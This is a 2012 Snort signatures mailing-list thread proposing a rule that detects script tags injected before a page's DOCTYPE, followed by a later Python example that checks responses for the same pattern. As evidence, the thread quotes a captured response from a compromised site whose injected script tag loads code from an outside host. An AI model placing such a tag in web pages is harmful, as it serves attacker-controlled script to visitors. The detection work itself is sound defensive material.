
List:       snort-sigs
Subject:    Re: [Snort-sigs] SIG: Script before DOCTYPE
From:       "Lay, James" <james.lay () wincofoods ! com>
Date:       2012-06-21 19:38:58
Message-ID: 65036AEB7E41D04FB34071B1081889A90409B150 () GOMAIL ! go ! winco ! local


Go for it Alex...thank you.

James

From: Alex Kirk [mailto:akirk@sourcefire.com] 
Sent: Thursday, June 21, 2012 1:37 PM
To: Lay, James
Cc: snort-sigs@lists.sourceforge.net
Subject: Re: [Snort-sigs] SIG: Script before DOCTYPE

That actually seems reasonable. You should only ever see <!DOCTYPE at
the start of a page, so I'd be surprised if this generates false
positives.

Would you like this to be included in the VRT set?

On Thu, Jun 21, 2012 at 3:27 PM, Lay, James <james.lay@wincofoods.com>
wrote:

All,

Not sure if this is a good sig or not:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALWARE
script before DOCTYPE possible malicious redirect";
flow:to_client,established; file_data; content:"</script><!DOCTYPE";
distance:0; nocase; metadata:policy security-ips drop, service http;
classtype:web-application-attack; sid:xxxxxxx; rev:1;)

 

Many times that I've seen malicious JavaScript injected it's usually
right at the top:

HTTP/1.1 200 OK
Date: Mon, 18 Jun 2012 17:29:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT;
path=/; domain=www.glasstilestore.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Set-Cookie: frontend=bleh; expires=Sun, 16-Sep-2012 17:29:21 GMT;
path=/; domain=www.glasstilestore.com; httponly
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

dd13
<script src='http://httpjs.com/api'
type='text/javascript'></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML
1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<!-- Google Website Optimizer Control Script -->
<script>


I welcome any pointers or reasons this sig stinks...danke :)

James


------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!





 

-- 
Alex Kirk
AEGIS Program Lead
Sourcefire Vulnerability Research Team
+1-410-423-1937
alex.kirk@sourcefire.com
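The check the rule above performs, worked through in Python as an added example (this is not code from the thread or from the VRT): it de-chunks a constructed HTTP/1.1 response modelled on the one James posted, mirrors the literal `content:"</script><!DOCTYPE"; nocase;` match, and then goes one step further than the rule by classifying whatever precedes the first DOCTYPE, so that a page whose only prelude is a BOM, whitespace or an HTML comment is reported clean rather than alerted on. The script host, the page bodies and the header set are constructed placeholders, not captured traffic.

```python
import re

# Constructed sample modelled on the response in the thread: a <script> tag
# injected ahead of the DOCTYPE in a chunked text/html response. The script
# host is a placeholder, not a real site.
INJECTED_PAGE = (
    b"<script src='http://example.invalid/api' type='text/javascript'></script>"
    b'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" '
    b'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n'
    b'<html xmlns="http://www.w3.org/1999/xhtml"><head></head><body></body></html>'
)

# Constructed clean page: only a UTF-8 BOM, whitespace and a comment precede the DOCTYPE.
CLEAN_PAGE = b"\xef\xbb\xbf\n<!-- build 42 -->\n<!DOCTYPE html><html><head></head></html>"


def chunked(payload: bytes, first: int = 40) -> bytes:
    """Encode payload as two HTTP/1.1 chunks followed by the terminating zero chunk."""
    parts = [payload[:first], payload[first:]]
    return b"".join(b"%x\r\n%s\r\n" % (len(p), p) for p in parts if p) + b"0\r\n\r\n"


def dechunk(body: bytes) -> bytes:
    """Decode a chunked transfer-coded body; chunk extensions and trailers are ignored."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += body[pos:pos + size]
        pos += size + 2  # chunk data plus its trailing CRLF


def response_body(raw: bytes) -> bytes:
    """Split a raw HTTP response into headers and body, de-chunking when the headers say so."""
    head, _, body = raw.partition(b"\r\n\r\n")
    if b"transfer-encoding: chunked" in head.lower():
        body = dechunk(body)
    return body


# Constructed raw response: a minimal header set plus the injected page, chunked.
RAW_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/html; charset=UTF-8\r\n"
    b"\r\n"
) + chunked(INJECTED_PAGE)

DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
SCRIPT_OPEN = re.compile(rb"<script\b", re.IGNORECASE)
# What may legitimately precede a DOCTYPE: a UTF-8 BOM, whitespace, HTML comments.
BENIGN_PRELUDE = re.compile(rb"\A(?:\xef\xbb\xbf|\s+|<!--.*?-->)*\Z", re.DOTALL)


def rule_matches(html: bytes) -> bool:
    """Literal equivalent of the rule's content:"</script><!DOCTYPE"; nocase; match."""
    return b"</script><!doctype" in html.lower()


def classify_prelude(html: bytes) -> str:
    """Describe what precedes the first DOCTYPE: 'clean', 'script-before-doctype',
    'unexpected-prelude' (something else sits before it) or 'no-doctype'."""
    m = DOCTYPE.search(html)
    if m is None:
        return "no-doctype"
    prelude = html[:m.start()]
    if BENIGN_PRELUDE.match(prelude):
        return "clean"
    if SCRIPT_OPEN.search(prelude):
        return "script-before-doctype"
    return "unexpected-prelude"


def scan_response(raw: bytes) -> dict:
    """Run both checks over the reassembled body of one HTTP response."""
    html = response_body(raw)
    return {"rule_match": rule_matches(html), "prelude": classify_prelude(html)}


if __name__ == "__main__":
    print(scan_response(RAW_RESPONSE))
    print(classify_prelude(CLEAN_PAGE), rule_matches(CLEAN_PAGE))
```

The `file_data` in the rule is what makes the comparison against the de-chunked body valid: Snort's HTTP inspector normalizes the response body before `content` is applied, which is why the literal match here runs on the reassembled page rather than on the raw chunk stream. The `classify_prelude` result is the part a tuner would want alongside the alert, since it separates "something unexpected precedes the DOCTYPE" from "nothing but a BOM or a comment does".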

